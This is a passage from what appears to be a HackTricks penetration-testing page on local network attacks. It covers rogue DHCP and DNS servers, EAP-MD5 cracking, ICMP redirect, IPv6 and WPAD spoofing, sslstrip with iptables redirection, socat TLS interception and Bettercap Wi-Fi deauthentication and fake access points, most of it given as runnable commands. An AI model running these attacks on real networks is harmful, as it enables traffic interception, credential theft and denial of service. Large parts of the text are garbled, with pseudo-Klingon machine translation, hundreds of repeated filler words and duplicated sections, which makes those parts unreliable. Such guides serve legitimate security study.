This attack will work only if you can see the responses of the DHCP server and complete the protocol (Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)). For example, this is not possible in Wifi networks.

Another way to perform a DHCP DoS is to send a DHCP-RELEASE packet using as source code every possible IP. Then, the server will think that everybody has finished using the IP.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Set malicious values

A rogue DHCP server can be set up using the DHCP script located at /usr/share/responder/DHCP.py. This is useful for network attacks, like capturing HTTP traffic and credentials, by redirecting traffic to a malicious server. However, setting a rogue gateway is less effective since it only allows capturing outbound traffic from the client, missing the responses from the real gateway. Instead, setting up a rogue DNS or WPAD server is recommended for a more effective attack.

Below are the command options for configuring the rogue DHCP server:

• Our IP Address (Gateway Advertisement): Use -i 10.0.0.100 to advertise your machine's IP as the gateway.
• Local DNS Domain Name: Optionally, use -d example.org to set a local DNS domain name.
• Original Router/Gateway IP: Use -r 10.0.0.1 to specify the IP address of the legitimate router or gateway.
• Primary DNS Server IP: Use -p 10.0.0.100 to set the IP address of the rogue DNS server you control.
• Secondary DNS Server IP: Optionally, use -s 10.0.0.1 to set a secondary DNS server IP.
• Netmask of Local Network: Use -n 255.255.255.0 to define the netmask for the local network.
• Interface for DHCP Traffic: Use -I eth1 to listen for DHCP traffic on a specific network interface.
• WPAD Configuration Address: Use -w “http://10.0.0.100/wpad.dat” to set the address for WPAD configuration, assisting in web traffic interception.
• Spoof Default Gateway IP: Include -S to spoof the default gateway IP address.
• Respond to All DHCP Requests: Include -R to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected.

By correctly using these options, a rogue DHCP server can be established to intercept network traffic effectively.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP Attacks

EAP tInmey

ghItlhmeH 802.1X implementations vItlhutlh:

• EAP Daq bruteforce password grinding
• RADIUS server Daq malformed EAP content **(exploits) vItlhutlh
• EAP message capture Daq offline password cracking (EAP-MD5 Daq PEAP)
• EAP-MD5 authentication Daq TLS certificate validation bypass
• Hub Daq similar vItlhutlh authenticating Daq malicious network traffic injection

vItlhutlh attacker vItlhutlh victim Daq authentication server vItlhutlh, 'ach EAP-MD5 authentication protocol vItlhutlh authentication attempt capture. vaj, 'ach brute-force vItlhutlh:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) Attacks

FHRP (First Hop Redundancy Protocol) is a class of network protocols designed to create a hot redundant routing system. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps distribute the load.

Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.

{% content-ref url="glbp-and-hsrp-attacks.md" %} glbp-and-hsrp-attacks.md {% endcontent-ref %}

RIP

Three versions of the Routing Information Protocol (RIP) are known to exist: RIP, RIPv2, and RIPng. Datagrams are sent to peers via port 520 using UDP by RIP and RIPv2, whereas datagrams are broadcasted to UDP port 521 via IPv6 multicast by RIPng. Support for MD5 authentication was introduced by RIPv2. On the other hand, native authentication is not incorporated by RIPng; instead, reliance is placed on optional IPsec AH and ESP headers within IPv6.

• RIP and RIPv2: Communication is done through UDP datagrams on port 520.
• RIPng: Utilizes UDP port 521 for broadcasting datagrams via IPv6 multicast.

Note that RIPv2 supports MD5 authentication while RIPng does not include native authentication, relying on IPsec AH and ESP headers in IPv6.

EIGRP Attacks

EIGRP (Enhanced Interior Gateway Routing Protocol) is a dynamic routing protocol. It is a distance-vector protocol. If there is no authentication and configuration of passive interfaces, an intruder can interfere with EIGRP routing and cause routing tables poisoning. Moreover, EIGRP network (in other words, autonomous system) is flat and has no segmentation into any zones. If an attacker injects a route, it is likely that this route will spread throughout the autonomous EIGRP system.

To attack a EIGRP system requires establishing a neighbourhood with a legitimate EIGRP router, which opens up a lot of possibilities, from basic reconnaissance to various injections.

FRRouting allows you to implement a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols. All you need to do is deploy it on your attacker’s system and you can actually pretend to be a legitimate router in the routing domain.

{% content-ref url="eigrp-attacks.md" %} eigrp-attacks.md {% endcontent-ref %}

Coly has capabilities for intercepting EIGRP (Enhanced Interior Gateway Routing Protocol) broadcasts. It also allows for the injection of packets, which can be utilized to alter routing configurations.

OSPF

In Open Shortest Path First (OSPF) protocol MD5 authentication is commonly employed to ensure secure communication between routers. However, this security measure can be compromised using tools like Loki and John the Ripper. These tools are capable of capturing and cracking MD5 hashes, exposing the authentication key. Once this key is obtained, it can be used to introduce new routing information. To configure the route parameters and establish the compromised key, the Injection and Connection tabs are utilized, respectively.

• Capturing and Cracking MD5 Hashes: Tools such as Loki and John the Ripper are used for this purpose.
• Configuring Route Parameters: This is done through the Injection tab.
• Setting the Compromised Key: The key is configured under the Connection tab.

Other Generic Tools & Sources

• Above: Tool to scan network traffic and find vulnerabilities
• You can find some more information about network attacks here.

Spoofing

The attacker configures all the network parameters (GW, IP, DNS) of the new member of the network sending fake DHCP responses.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Check the previous section.

ICMPRedirect

ICMP Redirect consist on sending an ICMP packet type 1 code 5 that indicates that the attacker is the best way to reach an IP. Then, when the victim wants to contact the IP, it will send the packet through the attacker.

ARP Spoofing

ghItlh.

ICMPRedirect

ICMP Redirect consist on sending an ICMP packet type 1 code 5 that indicates that the attacker is the best way to reach an IP. Then, when the victim wants to contact the IP, it will send the packet through the attacker.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

DNS Spoofing (DNS Spoofing) is a technique used by attackers to manipulate the Domain Name System (DNS) resolution process. The attacker intercepts and modifies the DNS responses to redirect the victim's requests to a malicious server.

How DNS Spoofing Works

1. The attacker sets up a rogue DNS server or compromises an existing DNS server.
2. The victim's device sends a DNS query to resolve a domain name.
3. The rogue DNS server intercepts the query and responds with a falsified DNS response.
4. The victim's device receives the falsified response and connects to the malicious server instead of the legitimate one.

Impact of DNS Spoofing

DNS Spoofing can have various malicious consequences, including:

• Phishing attacks: The attacker can redirect the victim to a fake website that mimics a legitimate one, tricking them into revealing sensitive information.
• Man-in-the-middle attacks: By redirecting the victim's traffic through a malicious server, the attacker can intercept and modify the communication between the victim and the legitimate server.
• Malware distribution: The attacker can redirect the victim to a server hosting malware, leading to the installation of malicious software on the victim's device.

Countermeasures

To mitigate the risk of DNS Spoofing, consider implementing the following countermeasures:

• DNSSEC (DNS Security Extensions): DNSSEC adds digital signatures to DNS responses, ensuring the authenticity and integrity of the DNS data.
• DNS monitoring: Regularly monitor DNS traffic for any suspicious activity or unexpected changes.
• Firewall rules: Configure firewall rules to block DNS traffic from unauthorized sources.
• DNS cache poisoning prevention: Implement measures to prevent DNS cache poisoning, such as using random transaction IDs and implementing source port randomization.

Conclusion

DNS Spoofing is a dangerous attack that can lead to various security risks. By understanding how it works and implementing appropriate countermeasures, you can better protect your network and users from this type of attack.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Configure own DNS with dnsmasq

tlhIngan Hol Translation:

Dnsmasq vItlhutlh

Dnsmasq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vIt

apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Local Gateways

Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use gateway-finder.py to identify hosts that support IPv4 forwarding.

qo'noS QIb

lo'laHbe'chugh je 'ej networkmeyvam vItlhutlh. lo'laHbe'chugh networkmeyvamDaj MAC addressmey vItlhutlh, gateway-finder.py vIlo'laHbe'ch 'ej IPv4 forwarding Qapla'wI'pu' hosts vItlhutlh.

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

Spoofing LLMNR, NBT-NS, and mDNS

DNS lookup jatlhlaHbe' 'ej DNS lookup bIQtIqpu' Microsoft systems rely on Link-Local Multicast Name Resolution (LLMNR) 'ej NetBIOS Name Service (NBT-NS). Apple Bonjour 'ej Linux zero-configuration implementations jatlhlaHbe' Multicast DNS (mDNS) for discovering systems within a network. 'e' vItlhutlh protocols 'ej UDP Daq 'e' vItlhutlh, broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services.

Responder to send fake responses to impersonate services that are searched by hosts.
How to Impersonate services with Responder for more information.

Spoofing WPAD

Browsers commonly employ the Web Proxy Auto-Discovery (WPAD) protocol to automatically acquire proxy settings. This involves fetching configuration details from a server, specifically through a URL such as "http://wpad.example.org/wpad.dat". The discovery of this server by the clients can happen through various mechanisms:

• Through DHCP, where the discovery is facilitated by utilizing a special code 252 entry.
• By DNS, which involves searching for a hostname labeled wpad within the local domain.
• Via Microsoft LLMNR and NBT-NS, which are fallback mechanisms used in cases where DNS lookups do not succeed.

Responder to act as a malicious WPAD server to take advantage of this protocol. It uses DHCP, DNS, LLMNR, and NBT-NS to mislead clients into connecting to it. Check this for more information on how services can be impersonated using Responder.

Spoofing SSDP and UPnP devices

You can offer different services in the network to try to trick a user to enter some plain-text credentials. More information about this attack in Spoofing SSDP and UPnP Devices.

IPv6 Neighbor Spoofing

This attack is very similar to ARP Spoofing but in the IPv6 world. You can get the victim think that the IPv6 of the GW has the MAC of the attacker.

sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

IPv6 Router Advertisement Spoofing/Flooding

Some OS configure by default the gateway from the RA packets sent in the network. To declare the attacker as IPv6 router you can use:

IPv6 Router Advertisement Spoofing/Flooding

Some OS configure by default the gateway from the RA packets sent in the network. To declare the attacker as IPv6 router you can use:

IPv6 Router Advertisement Spoofing/Flooding

Some OS configure by default the gateway from the RA packets sent in the network. To declare the attacker as IPv6 router you can use:

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

IPv6 DHCP spoofing

By default some OS try to configure the DNS reading a DHCPv6 packet in the network. Then, an attacker could send a DHCPv6 packet to configure himself as DNS. The DHCP also provides an IPv6 to the victim.

IPv6 DHCP spoofing

By default some OS try to configure the DNS reading a DHCPv6 packet in the network. Then, an attacker could send a DHCPv6 packet to configure himself as DNS. The DHCP also provides an IPv6 to the victim.

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

HTTP (fake page and JS code injection)

Internet Attacks

sslStrip

sslStrip-nISqu' 'oH user HTTP page access try case HTTPS version redirect maintain sslStrip HTTP connection client HTTPS connection server sniff connection plain text able.

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

sslStrip+ 'ej dns2proxy HSTS vItlhutlh

sslStrip+ 'ej dns2proxy sslStrip HSTS bypass Difference 'ej redirect 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej 'ej **'ej

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL port jImej

QaDmo' keys je self-signed certificate

$ openssl genrsa -out private.key 2048
$ openssl req -new -x509 -key private.key -out certificate.crt -days 365

Import the certificate into the trusted store

$ sudo cp certificate.crt /usr/local/share/ca-certificates/
$ sudo update-ca-certificates

Start the TCP + SSL listener

$ socat openssl-listen:443,reuseaddr,fork,cert=certificate.crt,key=private.key tcp4-listen:8443,reuseaddr,fork

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

qar'a' certificate lo'logh

To listen to network traffic using a certificate, you can follow these steps:

1. Obtain a valid certificate: You will need a valid certificate to decrypt the network traffic. This can be either a self-signed certificate or a certificate issued by a trusted Certificate Authority (CA).

2. Install the certificate: Once you have the certificate, you need to install it on the device or application that you will be using to intercept the network traffic. This can usually be done by importing the certificate into the device's certificate store or configuring the application to use the certificate.

3. Configure the interception tool: Next, you will need to configure the interception tool to use the installed certificate. This can involve specifying the certificate's location or providing the necessary credentials to access the certificate.

4. Start the interception: Once everything is set up, you can start the interception process. The interception tool will intercept the network traffic and use the installed certificate to decrypt the encrypted data.

5. Analyze the decrypted traffic: Finally, you can analyze the decrypted network traffic to gain insights into the communication between the client and the server. This can help you identify vulnerabilities or potential security issues.

It is important to note that intercepting network traffic using a certificate may be subject to legal restrictions and should only be done with proper authorization and for legitimate purposes.

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

Listen using certificate and redirect to the hosts

qar'a' certificate lo'laHbe'chugh, 'ej hosts vItlhutlh

To listen on a specific port using a certificate and redirect the traffic to different hosts, you can follow these steps:

1. Generate or obtain a valid SSL/TLS certificate for the domain you want to use. This certificate will be used to establish a secure connection with the clients.

2. Configure your server to listen on the desired port (e.g., port 443 for HTTPS) and use the obtained certificate for SSL/TLS encryption.

3. Set up the necessary DNS records to point the domain to the IP address of your server.

4. Configure the server to redirect incoming traffic to the appropriate hosts based on the requested domain. This can be done using reverse proxy configurations or load balancers.

5. Test the setup by accessing the domain from a client machine. The traffic should be redirected to the correct host based on the requested domain.

By following these steps, you can listen on a specific port using a certificate and redirect the traffic to different hosts based on the requested domain. This can be useful in scenarios where you have multiple services running on different hosts but want to use a single domain for accessing them securely.

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

Some times, if the client checks that the CA is a valid one, you could serve a certificate of other hostname signed by a CA.
Another interesting test, is to serve a certificate of the requested hostname but self-signed.

Other things to test is to try to sign the certificate with a valid certificate that it is not a valid CA. Or to use the valid public key, force to use an algorithm as diffie hellman (one that do not need to decrypt anything with the real private key) and when the client request a probe of the real private key (like a hash) send a fake probe and expect that the client does not check this.

Bettercap

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

Active Discovery Notes

Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent.

ARP discover

ARP packets are used to discover wich IPs are being used inside the network. The PC has to send a request for each possible IP address and only the ones that are being used will respond.

mDNS (multicast DNS)

Bettercap send a MDNS request (each X ms) asking for _services_.dns-sd._udp.local the machine that see this paket usually answer this request. Then, it only searchs for machine answering to "services".

Tools

• Avahi-browser (--all)
• Bettercap (net.probe.mdns)
• Responder

NBNS (NetBios Name Server)

Bettercap broadcast packets to the port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

SSDP (Simple Service Discovery Protocol)

Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 1900).

WSD (Web Service Discovery)

Bettercap broadcast WSD packets searching for services (UDP Port 3702).

References

• https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
• Network Security Assessment: Know Your Network (3rd edition)
• Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood
• https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.